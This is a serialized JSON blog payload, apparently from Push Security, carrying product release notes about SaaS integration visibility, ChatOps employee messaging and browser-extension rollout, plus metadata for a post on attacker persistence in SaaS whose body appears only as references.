",{"data":332079,"content":332080,"nodeType":178},{},[332081],{"data":332082,"marks":332083,"value":332084,"nodeType":173},{},[],"They often request access to company data and files, but fly under your radar because they’re buried under that core app and you don’t normally even see them. Turns out they’re just as risky as the core SaaS platforms employees are using.",{"data":332086,"content":332087,"nodeType":250},{},[332088,332107,332117],{"data":332089,"content":332090,"nodeType":254},{},[332091],{"data":332092,"content":332093,"nodeType":178},{},[332094,332098,332103],{"data":332095,"marks":332096,"value":332097,"nodeType":173},{},[],"You can now see ",{"data":332099,"marks":332100,"value":332102,"nodeType":173},{},[332101],{"type":1646},"all of those SaaS integrations ",{"data":332104,"marks":332105,"value":332106,"nodeType":173},{},[],"connected to your core SaaS platforms (Google Workspace and Microsoft 365) within the Push dashboard",{"data":332108,"content":332109,"nodeType":254},{},[332110],{"data":332111,"content":332112,"nodeType":178},{},[332113],{"data":332114,"marks":332115,"value":332116,"nodeType":173},{},[],"Get visibility on if those integrations are doing anything suspicious or malicious, or even if they’re asking for excessive or risky permissions.",{"data":332118,"content":332119,"nodeType":254},{},[332120],{"data":332121,"content":332122,"nodeType":178},{},[332123],{"data":332124,"marks":332125,"value":332126,"nodeType":173},{},[],"Soon, you'll be able to use ChatOps to Let us work directly with employees to remove any integrations they’ve tried, but aren’t actively using anymore to reduce your attack surface.",{"data":332128,"content":332132,"nodeType":312},{"target":332129},{"sys":332130},{"id":332131,"type":317,"linkType":318},"5bHuVjuvonkOMtVfiP5uiV",[],{"data":332134,"content":332135,"nodeType":178},{},[332136],{"data":332137,"marks":332138,"value":37,"nodeType":173},{},[],{"data":332140,"content":332141,"nodeType":178},{},[332142,332145,332152],{"data":332143,"marks":332144,"value":37,"nodeType":173},{},[],{"data":332146,"content":332148,"nodeType":186},{"uri":332147},"https://pushsecurity.com/s?c=third-party-integrations-demo1573",[332149],{"data":332150,"marks":332151,"value":332058,"nodeType":173},{},[],{"data":332153,"marks":332154,"value":37,"nodeType":173},{},[],{"data":332156,"content":332157,"nodeType":169},{},[332158],{"data":332159,"marks":332160,"value":331958,"nodeType":173},{},[],{"data":332162,"content":332163,"nodeType":178},{},[332164],{"data":332165,"marks":332166,"value":332167,"nodeType":173},{},[],"You’ve probably heard us mention ChatOps before. Simply finding security issues alone isn’t useful; you need clear, actionable next steps. For a lot of security issues, those next steps will inevitably require, or benefit from, something from the user.",{"data":332169,"content":332170,"nodeType":178},{},[332171],{"data":332172,"marks":332173,"value":332174,"nodeType":173},{},[],"For example, if you find a user is using the same password to log in to Microsoft 365 as 6 other, perhaps less reputable platforms, you might like to ask the user to update their password…",{"data":332176,"content":332177,"nodeType":178},{},[332178],{"data":332179,"marks":332180,"value":332181,"nodeType":173},{},[],"…or register for MFA….",{"data":332183,"content":332184,"nodeType":178},{},[332185],{"data":332186,"marks":332187,"value":332188,"nodeType":173},{},[],"…or remove that dodgy third-party integration…",{"data":332190,"content":332191,"nodeType":178},{},[332192],{"data":332193,"marks":332194,"value":332195,"nodeType":173},{},[],"…or a million other things. You could do this yourself but with ChatOps, Push can find these issues and fix them without you lifting a finger.",{"data":332197,"content":332198,"nodeType":178},{},[332199],{"data":332200,"marks":332201,"value":332202,"nodeType":173},{},[],"And we’re already seeing the impact. For example, we mentioned earlier you can use ChatOps to deploy our browser extension - customers that have already done this have seen over 80% of employees set up without any action needed from the security/IT teams. It’s great to see the ChatOps concept be so effective and over time we’ll be tweaking how, when, and what we message users to improve even further!",{"data":332204,"content":332205,"nodeType":178},{},[332206],{"data":332207,"marks":332208,"value":332209,"nodeType":173},{},[],"Alongside this, in response to your feedback, we’ve got a fresh update for how you set up and monitor ChatOps that gives you full control over which employees are active for ChatOps, and which topics we should speak to employees about. Check it out:",{"data":332211,"content":332215,"nodeType":312},{"target":332212},{"sys":332213},{"id":332214,"type":317,"linkType":318},"1UdFP3SM23Zos2B4LoYExp",[],{"data":332217,"content":332218,"nodeType":178},{},[332219,332223,332231,332235,332242],{"data":332220,"marks":332221,"value":332222,"nodeType":173},{},[],"All these features are available now so ",{"data":332224,"content":332226,"nodeType":186},{"uri":332225},"https://pushsecurity.com/app/users/",[332227],{"data":332228,"marks":332229,"value":332230,"nodeType":173},{},[],"log in to your account",{"data":332232,"marks":332233,"value":332234,"nodeType":173},{},[]," to give them a go. New users can sign up for free by heading to ",{"data":332236,"content":332238,"nodeType":186},{"uri":332237},"https://pushsecurity.com",[332239],{"data":332240,"marks":332241,"value":323703,"nodeType":173},{},[],{"data":332243,"marks":332244,"value":332245,"nodeType":173},{},[]," and clicking \"Try it free.\"",{"data":332247,"content":332248,"nodeType":178},{},[332249],{"data":332250,"marks":332251,"value":37,"nodeType":173},{},[332252],{"type":194},"Product release: July 2022","Here’s what’s new on the Push platform for July 2022.","2022-07-15T00:00:00.000Z","product-release-july-2022",{"items":332258},[332259],{"sys":332260,"name":18399},{"id":18398},{"items":332262},[332263],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":332264},{"url":19129},{"items":332266},[332267],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":332268},{"url":19129},{"json":332270,"links":332625},{"data":332271,"content":332272,"nodeType":165},{},[332273,332279,332321,332327,332340,332375,332395,332418,332433,332438,332444,332464,332469,332475,332526,332541,332547,332553,332566,332571,332577,332590,332595,332610],{"data":332274,"content":332275,"nodeType":235},{},[332276],{"data":332277,"marks":332278,"value":319335,"nodeType":173},{},[],{"data":332280,"content":332281,"nodeType":250},{},[332282,332295,332308],{"data":332283,"content":332284,"nodeType":254},{},[332285],{"data":332286,"content":332287,"nodeType":178},{},[332288,332292],{"data":332289,"marks":332290,"value":156526,"nodeType":173},{},[332291],{"type":370},{"data":332293,"marks":332294,"value":319352,"nodeType":173},{},[],{"data":332296,"content":332297,"nodeType":254},{},[332298],{"data":332299,"content":332300,"nodeType":178},{},[332301,332305],{"data":332302,"marks":332303,"value":319363,"nodeType":173},{},[332304],{"type":370},{"data":332306,"marks":332307,"value":319367,"nodeType":173},{},[],{"data":332309,"content":332310,"nodeType":254},{},[332311],{"data":332312,"content":332313,"nodeType":178},{},[332314,332318],{"data":332315,"marks":332316,"value":319378,"nodeType":173},{},[332317],{"type":370},{"data":332319,"marks":332320,"value":319382,"nodeType":173},{},[],{"data":332322,"content":332323,"nodeType":235},{},[332324],{"data":332325,"marks":332326,"value":319389,"nodeType":173},{},[],{"data":332328,"content":332329,"nodeType":178},{},[332330,332333,332337],{"data":332331,"marks":332332,"value":319396,"nodeType":173},{},[],{"data":332334,"marks":332335,"value":319401,"nodeType":173},{},[332336],{"type":370},{"data":332338,"marks":332339,"value":319405,"nodeType":173},{},[],{"data":332341,"content":332342,"nodeType":250},{},[332343,332359],{"data":332344,"content":332345,"nodeType":254},{},[332346],{"data":332347,"content":332348,"nodeType":178},{},[332349,332352,332356],{"data":332350,"marks":332351,"value":319418,"nodeType":173},{},[],{"data":332353,"marks":332354,"value":319423,"nodeType":173},{},[332355],{"type":370},{"data":332357,"marks":332358,"value":319427,"nodeType":173},{},[],{"data":332360,"content":332361,"nodeType":254},{},[332362],{"data":332363,"content":332364,"nodeType":178},{},[332365,332368,332372],{"data":332366,"marks":332367,"value":319437,"nodeType":173},{},[],{"data":332369,"marks":332370,"value":319442,"nodeType":173},{},[332371],{"type":370},{"data":332373,"marks":332374,"value":1477,"nodeType":173},{},[],{"data":332376,"content":332377,"nodeType":178},{},[332378,332381,332385,332388,332392],{"data":332379,"marks":332380,"value":319452,"nodeType":173},{},[],{"data":332382,"marks":332383,"value":319457,"nodeType":173},{},[332384],{"type":370},{"data":332386,"marks":332387,"value":1464,"nodeType":173},{},[],{"data":332389,"marks":332390,"value":319465,"nodeType":173},{},[332391],{"type":370},{"data":332393,"marks":332394,"value":319469,"nodeType":173},{},[],{"data":332396,"content":332397,"nodeType":178},{},[332398,332401,332408,332411,332415],{"data":332399,"marks":332400,"value":319476,"nodeType":173},{},[],{"data":332402,"content":332403,"nodeType":186},{"uri":319479},[332404],{"data":332405,"marks":332406,"value":156537,"nodeType":173},{},[332407],{"type":370},{"data":332409,"marks":332410,"value":319488,"nodeType":173},{},[],{"data":332412,"marks":332413,"value":319493,"nodeType":173},{},[332414],{"type":370},{"data":332416,"marks":332417,"value":319497,"nodeType":173},{},[],{"data":332419,"content":332420,"nodeType":178},{},[332421,332424,332430],{"data":332422,"marks":332423,"value":319504,"nodeType":173},{},[],{"data":332425,"content":332426,"nodeType":186},{"uri":301319},[332427],{"data":332428,"marks":332429,"value":301322,"nodeType":173},{},[],{"data":332431,"marks":332432,"value":1477,"nodeType":173},{},[],{"data":332434,"content":332437,"nodeType":312},{"target":332435},{"sys":332436},{"id":319518,"type":317,"linkType":318},[],{"data":332439,"content":332440,"nodeType":235},{},[332441],{"data":332442,"marks":332443,"value":319526,"nodeType":173},{},[],{"data":332445,"content":332446,"nodeType":178},{},[332447,332450,332454,332461],{"data":332448,"marks":332449,"value":319533,"nodeType":173},{},[],{"data":332451,"marks":332452,"value":319538,"nodeType":173},{},[332453],{"type":370},{"data":332455,"content":332456,"nodeType":186},{"uri":319479},[332457],{"data":332458,"marks":332459,"value":319546,"nodeType":173},{},[332460],{"type":370},{"data":332462,"marks":332463,"value":1477,"nodeType":173},{},[],{"data":332465,"content":332468,"nodeType":312},{"target":332466},{"sys":332467},{"id":319554,"type":317,"linkType":318},[],{"data":332470,"content":332471,"nodeType":178},{},[332472],{"data":332473,"marks":332474,"value":319562,"nodeType":173},{},[],{"data":332476,"content":332477,"nodeType":250},{},[332478,332494,332510],{"data":332479,"content":332480,"nodeType":254},{},[332481],{"data":332482,"content":332483,"nodeType":178},{},[332484,332487,332491],{"data":332485,"marks":332486,"value":319575,"nodeType":173},{},[],{"data":332488,"marks":332489,"value":319580,"nodeType":173},{},[332490],{"type":370},{"data":332492,"marks":332493,"value":319584,"nodeType":173},{},[],{"data":332495,"content":332496,"nodeType":254},{},[332497],{"data":332498,"content":332499,"nodeType":178},{},[332500,332503,332507],{"data":332501,"marks":332502,"value":319594,"nodeType":173},{},[],{"data":332504,"marks":332505,"value":319599,"nodeType":173},{},[332506],{"type":370},{"data":332508,"marks":332509,"value":319603,"nodeType":173},{},[],{"data":332511,"content":332512,"nodeType":254},{},[332513],{"data":332514,"content":332515,"nodeType":178},{},[332516,332519,332523],{"data":332517,"marks":332518,"value":319613,"nodeType":173},{},[],{"data":332520,"marks":332521,"value":319618,"nodeType":173},{},[332522],{"type":370},{"data":332524,"marks":332525,"value":319622,"nodeType":173},{},[],{"data":332527,"content":332528,"nodeType":178},{},[332529,332532,332538],{"data":332530,"marks":332531,"value":319629,"nodeType":173},{},[],{"data":332533,"content":332534,"nodeType":186},{"uri":319632},[332535],{"data":332536,"marks":332537,"value":319637,"nodeType":173},{},[],{"data":332539,"marks":332540,"value":319641,"nodeType":173},{},[],{"data":332542,"content":332543,"nodeType":178},{},[332544],{"data":332545,"marks":332546,"value":319648,"nodeType":173},{},[],{"data":332548,"content":332549,"nodeType":235},{},[332550],{"data":332551,"marks":332552,"value":319655,"nodeType":173},{},[],{"data":332554,"content":332555,"nodeType":178},{},[332556,332559,332563],{"data":332557,"marks":332558,"value":319662,"nodeType":173},{},[],{"data":332560,"marks":332561,"value":319667,"nodeType":173},{},[332562],{"type":370},{"data":332564,"marks":332565,"value":319671,"nodeType":173},{},[],{"data":332567,"content":332570,"nodeType":312},{"target":332568},{"sys":332569},{"id":319676,"type":317,"linkType":318},[],{"data":332572,"content":332573,"nodeType":178},{},[332574],{"data":332575,"marks":332576,"value":319684,"nodeType":173},{},[],{"data":332578,"content":332579,"nodeType":178},{},[332580,332583,332587],{"data":332581,"marks":332582,"value":319691,"nodeType":173},{},[],{"data":332584,"marks":332585,"value":319696,"nodeType":173},{},[332586],{"type":370},{"data":332588,"marks":332589,"value":319700,"nodeType":173},{},[],{"data":332591,"content":332594,"nodeType":312},{"target":332592},{"sys":332593},{"id":319705,"type":317,"linkType":318},[],{"data":332596,"content":332597,"nodeType":178},{},[332598,332601,332607],{"data":332599,"marks":332600,"value":319713,"nodeType":173},{},[],{"data":332602,"content":332603,"nodeType":186},{"uri":319716},[332604],{"data":332605,"marks":332606,"value":21642,"nodeType":173},{},[],{"data":332608,"marks":332609,"value":1477,"nodeType":173},{},[],{"data":332611,"content":332612,"nodeType":178},{},[332613,332616,332622],{"data":332614,"marks":332615,"value":319730,"nodeType":173},{},[],{"data":332617,"content":332618,"nodeType":186},{"uri":301319},[332619],{"data":332620,"marks":332621,"value":319737,"nodeType":173},{},[],{"data":332623,"marks":332624,"value":319741,"nodeType":173},{},[],{"entries":332626},{"hyperlink":332627,"inline":332628,"block":332629},[],[],[332630,332637,332645,332653],{"sys":332631,"__typename":5345,"title":332632,"caption":332633,"layoutMode":118,"file":332634},{"id":319518},"Channel messaging screenshot - Dec 2022 release notes","Configure ChatOps for your security team to get channel notifications on potential account compromises or new SaaS in your environment.",{"url":332635,"width":332636,"height":265204},"https://images.ctfassets.net/y1cdw1ablpvd/uHBwYitNomqE21mp4iq15/c248f8aa525e7a625341bfb93fbc8806/channel_messaging.png",2762,{"sys":332638,"__typename":5345,"title":332639,"caption":332640,"layoutMode":118,"file":332641},{"id":319554},"ChatOps subtopics screenshot - December 2022 release notes","You can now enable individual subtopics on the ChatOps page.",{"url":332642,"width":332643,"height":332644},"https://images.ctfassets.net/y1cdw1ablpvd/3F0njaHj6qFaqpAjwhg8HP/749c814f9ce5189225a7aa8cb1051b92/chatops_controls.png",2766,1230,{"sys":332646,"__typename":5345,"title":332647,"caption":332648,"layoutMode":118,"file":332649},{"id":319676},"Browser extension deployment progress details","Check the \"Installed but not enrolled\" panel on the Browsers page to track your extension rollout progress.",{"url":332650,"width":332651,"height":332652},"https://images.ctfassets.net/y1cdw1ablpvd/6FKbSHRWankkPDaAfflXUb/6acbf6fc2062a0d16582170a3864ad3b/enrollment_progress_box_20231221.png",1874,1091,{"sys":332654,"__typename":5345,"title":332655,"caption":332656,"layoutMode":118,"file":332657},{"id":319705},"Browser extension deployment progress details - modal","After you select \"View details,\" you can find unidentified or unmonitored browser profiles.",{"url":332658,"width":332651,"height":332659},"https://images.ctfassets.net/y1cdw1ablpvd/45WCvvBlSj8PFN0bOeWAds/63845c78513372b01838e7e397278dba/extension_rollout_progress_details_20231221.png",1093,"content:blog:product-release-december-2022.json","blog/product-release-december-2022.json","blog/product-release-december-2022",{"_path":332664,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":332665,"ogImage":118,"summary":332667,"title":277468,"subtitle":118,"metaTitle":332678,"synopsis":289734,"hashTags":118,"publishedDate":289735,"slug":277469,"tagsCollection":332679,"relatedBlogPostsCollection":332683,"authorsCollection":333410,"content":333414,"_id":333895,"_type":5439,"_source":5440,"_file":333896,"_stem":333897,"_extension":5439},"/blog/maintaining-persistent-access-in-a-saas-first-world",{"id":276988,"publishedAt":332666},"2025-04-28T18:11:53.250Z",{"json":332668},{"data":332669,"content":332670,"nodeType":165},{},[332671],{"data":332672,"content":332673,"nodeType":178},{},[332674],{"data":332675,"marks":332676,"value":332677,"nodeType":173},{},[],"In this post, we’ll explore new methods for attackers to maintain persistence in the cloud","How to maintain persistent access in a SaaS-native company",{"items":332680},[332681],{"sys":332682,"name":505},{"id":504},{"items":332684},[332685,333101],{"__typename":1528,"sys":332686,"content":332687,"title":288168,"synopsis":318418,"hashTags":118,"publishedDate":318419,"slug":288169,"tagsCollection":333091,"authorsCollection":333097},{"id":274110},{"json":332688},{"data":332689,"content":332690,"nodeType":165},{},[332691,332698,332705,332723,332730,332748,332754,332759,332765,332771,332777,332783,332789,332795,332801,332807,332813,332818,332824,332830,332836,332842,332858,332863,332869,332874,332880,332885,332891,332897,332903,332942,332948,332964,332970,333052,333068,333074,333080,333085],{"data":332692,"content":332693,"nodeType":178},{},[332694],{"data":332695,"marks":332696,"value":317965,"nodeType":173},{},[332697],{"type":1646},{"data":332699,"content":332700,"nodeType":178},{},[332701],{"data":332702,"marks":332703,"value":317973,"nodeType":173},{},[332704],{"type":1646},{"data":332706,"content":332707,"nodeType":178},{},[332708,332711,332720],{"data":332709,"marks":332710,"value":317980,"nodeType":173},{},[],{"data":332712,"content":332715,"nodeType":1698},{"target":332713},{"sys":332714},{"id":317985,"type":317,"linkType":318},[332716],{"data":332717,"marks":332718,"value":317991,"nodeType":173},{},[332719],{"type":194},{"data":332721,"marks":332722,"value":317995,"nodeType":173},{},[],{"data":332724,"content":332725,"nodeType":178},{},[332726],{"data":332727,"marks":332728,"value":318003,"nodeType":173},{},[332729],{"type":1646},{"data":332731,"content":332732,"nodeType":178},{},[332733,332736,332745],{"data":332734,"marks":332735,"value":318010,"nodeType":173},{},[],{"data":332737,"content":332740,"nodeType":1698},{"target":332738},{"sys":332739},{"id":269414,"type":317,"linkType":318},[332741],{"data":332742,"marks":332743,"value":318020,"nodeType":173},{},[332744],{"type":194},{"data":332746,"marks":332747,"value":318024,"nodeType":173},{},[],{"data":332749,"content":332750,"nodeType":178},{},[332751],{"data":332752,"marks":332753,"value":318031,"nodeType":173},{},[],{"data":332755,"content":332758,"nodeType":312},{"target":332756},{"sys":332757},{"id":318036,"type":317,"linkType":318},[],{"data":332760,"content":332761,"nodeType":178},{},[332762],{"data":332763,"marks":332764,"value":318044,"nodeType":173},{},[],{"data":332766,"content":332767,"nodeType":235},{},[332768],{"data":332769,"marks":332770,"value":318051,"nodeType":173},{},[],{"data":332772,"content":332773,"nodeType":178},{},[332774],{"data":332775,"marks":332776,"value":318058,"nodeType":173},{},[],{"data":332778,"content":332779,"nodeType":178},{},[332780],{"data":332781,"marks":332782,"value":318065,"nodeType":173},{},[],{"data":332784,"content":332785,"nodeType":235},{},[332786],{"data":332787,"marks":332788,"value":318072,"nodeType":173},{},[],{"data":332790,"content":332791,"nodeType":178},{},[332792],{"data":332793,"marks":332794,"value":318079,"nodeType":173},{},[],{"data":332796,"content":332797,"nodeType":178},{},[332798],{"data":332799,"marks":332800,"value":318086,"nodeType":173},{},[],{"data":332802,"content":332803,"nodeType":178},{},[332804],{"data":332805,"marks":332806,"value":318093,"nodeType":173},{},[],{"data":332808,"content":332809,"nodeType":178},{},[332810],{"data":332811,"marks":332812,"value":318100,"nodeType":173},{},[],{"data":332814,"content":332817,"nodeType":312},{"target":332815},{"sys":332816},{"id":318105,"type":317,"linkType":318},[],{"data":332819,"content":332820,"nodeType":178},{},[332821],{"data":332822,"marks":332823,"value":318113,"nodeType":173},{},[],{"data":332825,"content":332826,"nodeType":235},{},[332827],{"data":332828,"marks":332829,"value":318120,"nodeType":173},{},[],{"data":332831,"content":332832,"nodeType":178},{},[332833],{"data":332834,"marks":332835,"value":318127,"nodeType":173},{},[],{"data":332837,"content":332838,"nodeType":178},{},[332839],{"data":332840,"marks":332841,"value":318134,"nodeType":173},{},[],{"data":332843,"content":332844,"nodeType":178},{},[332845,332848,332855],{"data":332846,"marks":332847,"value":318141,"nodeType":173},{},[],{"data":332849,"content":332850,"nodeType":186},{"uri":270424},[332851],{"data":332852,"marks":332853,"value":270427,"nodeType":173},{},[332854],{"type":194},{"data":332856,"marks":332857,"value":318152,"nodeType":173},{},[],{"data":332859,"content":332862,"nodeType":312},{"target":332860},{"sys":332861},{"id":318157,"type":317,"linkType":318},[],{"data":332864,"content":332865,"nodeType":178},{},[332866],{"data":332867,"marks":332868,"value":318165,"nodeType":173},{},[],{"data":332870,"content":332873,"nodeType":312},{"target":332871},{"sys":332872},{"id":318170,"type":317,"linkType":318},[],{"data":332875,"content":332876,"nodeType":178},{},[332877],{"data":332878,"marks":332879,"value":318178,"nodeType":173},{},[],{"data":332881,"content":332884,"nodeType":312},{"target":332882},{"sys":332883},{"id":318183,"type":317,"linkType":318},[],{"data":332886,"content":332887,"nodeType":235},{},[332888],{"data":332889,"marks":332890,"value":318191,"nodeType":173},{},[],{"data":332892,"content":332893,"nodeType":178},{},[332894],{"data":332895,"marks":332896,"value":318198,"nodeType":173},{},[],{"data":332898,"content":332899,"nodeType":178},{},[332900],{"data":332901,"marks":332902,"value":318205,"nodeType":173},{},[],{"data":332904,"content":332905,"nodeType":250},{},[332906,332915,332924,332933],{"data":332907,"content":332908,"nodeType":254},{},[332909],{"data":332910,"content":332911,"nodeType":178},{},[332912],{"data":332913,"marks":332914,"value":318218,"nodeType":173},{},[],{"data":332916,"content":332917,"nodeType":254},{},[332918],{"data":332919,"content":332920,"nodeType":178},{},[332921],{"data":332922,"marks":332923,"value":318228,"nodeType":173},{},[],{"data":332925,"content":332926,"nodeType":254},{},[332927],{"data":332928,"content":332929,"nodeType":178},{},[332930],{"data":332931,"marks":332932,"value":318238,"nodeType":173},{},[],{"data":332934,"content":332935,"nodeType":254},{},[332936],{"data":332937,"content":332938,"nodeType":178},{},[332939],{"data":332940,"marks":332941,"value":318248,"nodeType":173},{},[],{"data":332943,"content":332944,"nodeType":178},{},[332945],{"data":332946,"marks":332947,"value":318255,"nodeType":173},{},[],{"data":332949,"content":332950,"nodeType":178},{},[332951,332954,332961],{"data":332952,"marks":332953,"value":318262,"nodeType":173},{},[],{"data":332955,"content":332956,"nodeType":186},{"uri":318265},[332957],{"data":332958,"marks":332959,"value":318271,"nodeType":173},{},[332960],{"type":194},{"data":332962,"marks":332963,"value":318275,"nodeType":173},{},[],{"data":332965,"content":332966,"nodeType":178},{},[332967],{"data":332968,"marks":332969,"value":318282,"nodeType":173},{},[],{"data":332971,"content":332972,"nodeType":250},{},[332973,332982,332991,333000,333019,333034,333043],{"data":332974,"content":332975,"nodeType":254},{},[332976],{"data":332977,"content":332978,"nodeType":178},{},[332979],{"data":332980,"marks":332981,"value":318295,"nodeType":173},{},[],{"data":332983,"content":332984,"nodeType":254},{},[332985],{"data":332986,"content":332987,"nodeType":178},{},[332988],{"data":332989,"marks":332990,"value":318305,"nodeType":173},{},[],{"data":332992,"content":332993,"nodeType":254},{},[332994],{"data":332995,"content":332996,"nodeType":178},{},[332997],{"data":332998,"marks":332999,"value":318315,"nodeType":173},{},[],{"data":333001,"content":333002,"nodeType":254},{},[333003],{"data":333004,"content":333005,"nodeType":178},{},[333006,333009,333016],{"data":333007,"marks":333008,"value":37,"nodeType":173},{},[],{"data":333010,"content":333011,"nodeType":186},{"uri":318327},[333012],{"data":333013,"marks":333014,"value":318333,"nodeType":173},{},[333015],{"type":194},{"data":333017,"marks":333018,"value":37,"nodeType":173},{},[],{"data":333020,"content":333021,"nodeType":254},{},[333022],{"data":333023,"content":333024,"nodeType":250},{},[333025],{"data":333026,"content":333027,"nodeType":254},{},[333028],{"data":333029,"content":333030,"nodeType":178},{},[333031],{"data":333032,"marks":333033,"value":318352,"nodeType":173},{},[],{"data":333035,"content":333036,"nodeType":254},{},[333037],{"data":333038,"content":333039,"nodeType":178},{},[333040],{"data":333041,"marks":333042,"value":318362,"nodeType":173},{},[],{"data":333044,"content":333045,"nodeType":254},{},[333046],{"data":333047,"content":333048,"nodeType":178},{},[333049],{"data":333050,"marks":333051,"value":318372,"nodeType":173},{},[],{"data":333053,"content":333054,"nodeType":178},{},[333055,333058,333065],{"data":333056,"marks":333057,"value":318379,"nodeType":173},{},[],{"data":333059,"content":333060,"nodeType":186},{"uri":318382},[333061],{"data":333062,"marks":333063,"value":318388,"nodeType":173},{},[333064],{"type":194},{"data":333066,"marks":333067,"value":318392,"nodeType":173},{},[],{"data":333069,"content":333070,"nodeType":235},{},[333071],{"data":333072,"marks":333073,"value":40632,"nodeType":173},{},[],{"data":333075,"content":333076,"nodeType":178},{},[333077],{"data":333078,"marks":333079,"value":318405,"nodeType":173},{},[],{"data":333081,"content":333084,"nodeType":312},{"target":333082},{"sys":333083},{"id":318410,"type":317,"linkType":318},[],{"data":333086,"content":333087,"nodeType":178},{},[333088],{"data":333089,"marks":333090,"value":37,"nodeType":173},{},[],{"items":333092},[333093,333095],{"sys":333094,"name":509},{"id":508},{"sys":333096,"name":26137},{"id":26136},{"items":333098},[333099],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":333100},{"url":155985},{"__typename":1528,"sys":333102,"content":333103,"title":317594,"synopsis":317595,"hashTags":333399,"publishedDate":317603,"slug":317604,"tagsCollection":333400,"authorsCollection":333406},{"id":289406},{"json":333104},{"nodeType":165,"data":333105,"content":333106},{},[333107,333113,333118,333124,333140,333163,333169,333244,333259,333262,333268,333283,333289,333295,333298,333304,333341,333347,333362,333368,333371,333378,333384],{"nodeType":178,"data":333108,"content":333109},{},[333110],{"nodeType":173,"value":317265,"marks":333111,"data":333112},[],{},{"nodeType":312,"data":333114,"content":333117},{"target":333115},{"sys":333116},{"id":317272,"type":317,"linkType":318},[],{"nodeType":178,"data":333119,"content":333120},{},[333121],{"nodeType":173,"value":317278,"marks":333122,"data":333123},[],{},{"nodeType":3769,"data":333125,"content":333126},{},[333127],{"nodeType":178,"data":333128,"content":333129},{},[333130,333133,333137],{"nodeType":173,"value":317288,"marks":333131,"data":333132},[],{},{"nodeType":173,"value":317292,"marks":333134,"data":333136},[333135],{"type":370},{},{"nodeType":173,"value":317297,"marks":333138,"data":333139},[],{},{"nodeType":178,"data":333141,"content":333142},{},[333143,333146,333153,333156,333160],{"nodeType":173,"value":317304,"marks":333144,"data":333145},[],{},{"nodeType":186,"data":333147,"content":333148},{"uri":317309},[333149],{"nodeType":173,"value":22819,"marks":333150,"data":333152},[333151],{"type":194},{},{"nodeType":173,"value":317316,"marks":333154,"data":333155},[],{},{"nodeType":173,"value":317320,"marks":333157,"data":333159},[333158],{"type":1646},{},{"nodeType":173,"value":317325,"marks":333161,"data":333162},[],{},{"nodeType":178,"data":333164,"content":333165},{},[333166],{"nodeType":173,"value":317332,"marks":333167,"data":333168},[],{},{"nodeType":250,"data":333170,"content":333171},{},[333172,333190,333208,333226],{"nodeType":254,"data":333173,"content":333174},{},[333175],{"nodeType":178,"data":333176,"content":333177},{},[333178,333181,333187],{"nodeType":173,"value":37,"marks":333179,"data":333180},[],{},{"nodeType":186,"data":333182,"content":333183},{"uri":317349},[333184],{"nodeType":173,"value":317352,"marks":333185,"data":333186},[],{},{"nodeType":173,"value":37,"marks":333188,"data":333189},[],{},{"nodeType":254,"data":333191,"content":333192},{},[333193],{"nodeType":178,"data":333194,"content":333195},{},[333196,333199,333205],{"nodeType":173,"value":37,"marks":333197,"data":333198},[],{},{"nodeType":186,"data":333200,"content":333201},{"uri":317369},[333202],{"nodeType":173,"value":317372,"marks":333203,"data":333204},[],{},{"nodeType":173,"value":37,"marks":333206,"data":333207},[],{},{"nodeType":254,"data":333209,"content":333210},{},[333211],{"nodeType":178,"data":333212,"content":333213},{},[333214,333217,333223],{"nodeType":173,"value":37,"marks":333215,"data":333216},[],{},{"nodeType":186,"data":333218,"content":333219},{"uri":317389},[333220],{"nodeType":173,"value":317392,"marks":333221,"data":333222},[],{},{"nodeType":173,"value":10557,"marks":333224,"data":333225},[],{},{"nodeType":254,"data":333227,"content":333228},{},[333229],{"nodeType":178,"data":333230,"content":333231},{},[333232,333235,333241],{"nodeType":173,"value":37,"marks":333233,"data":333234},[],{},{"nodeType":186,"data":333236,"content":333237},{"uri":317409},[333238],{"nodeType":173,"value":317412,"marks":333239,"data":333240},[],{},{"nodeType":173,"value":37,"marks":333242,"data":333243},[],{},{"nodeType":178,"data":333245,"content":333246},{},[333247,333250,333256],{"nodeType":173,"value":317422,"marks":333248,"data":333249},[],{},{"nodeType":186,"data":333251,"content":333252},{"uri":317427},[333253],{"nodeType":173,"value":317430,"marks":333254,"data":333255},[],{},{"nodeType":173,"value":317434,"marks":333257,"data":333258},[],{},{"nodeType":231,"data":333260,"content":333261},{},[],{"nodeType":169,"data":333263,"content":333264},{},[333265],{"nodeType":173,"value":317444,"marks":333266,"data":333267},[],{},{"nodeType":178,"data":333269,"content":333270},{},[333271,333274,333280],{"nodeType":173,"value":37,"marks":333272,"data":333273},[],{},{"nodeType":186,"data":333275,"content":333276},{"uri":317455},[333277],{"nodeType":173,"value":317458,"marks":333278,"data":333279},[],{},{"nodeType":173,"value":317462,"marks":333281,"data":333282},[],{},{"nodeType":178,"data":333284,"content":333285},{},[333286],{"nodeType":173,"value":317469,"marks":333287,"data":333288},[],{},{"nodeType":178,"data":333290,"content":333291},{},[333292],{"nodeType":173,"value":317476,"marks":333293,"data":333294},[],{},{"nodeType":231,"data":333296,"content":333297},{},[],{"nodeType":169,"data":333299,"content":333300},{},[333301],{"nodeType":173,"value":317486,"marks":333302,"data":333303},[],{},{"nodeType":178,"data":333305,"content":333306},{},[333307,333310,333316,333319,333327,333330,333338],{"nodeType":173,"value":317493,"marks":333308,"data":333309},[],{},{"nodeType":186,"data":333311,"content":333312},{"uri":317498},[333313],{"nodeType":173,"value":317501,"marks":333314,"data":333315},[],{},{"nodeType":173,"value":317505,"marks":333317,"data":333318},[],{},{"nodeType":1698,"data":333320,"content":333323},{"target":333321},{"sys":333322},{"id":317512,"type":317,"linkType":318},[333324],{"nodeType":173,"value":317515,"marks":333325,"data":333326},[],{},{"nodeType":173,"value":1464,"marks":333328,"data":333329},[],{},{"nodeType":1698,"data":333331,"content":333334},{"target":333332},{"sys":333333},{"id":317525,"type":317,"linkType":318},[333335],{"nodeType":173,"value":211147,"marks":333336,"data":333337},[],{},{"nodeType":173,"value":1477,"marks":333339,"data":333340},[],{},{"nodeType":178,"data":333342,"content":333343},{},[333344],{"nodeType":173,"value":317537,"marks":333345,"data":333346},[],{},{"nodeType":178,"data":333348,"content":333349},{},[333350,333353,333359],{"nodeType":173,"value":317544,"marks":333351,"data":333352},[],{},{"nodeType":186,"data":333354,"content":333355},{"uri":317498},[333356],{"nodeType":173,"value":139178,"marks":333357,"data":333358},[],{},{"nodeType":173,"value":1477,"marks":333360,"data":333361},[],{},{"node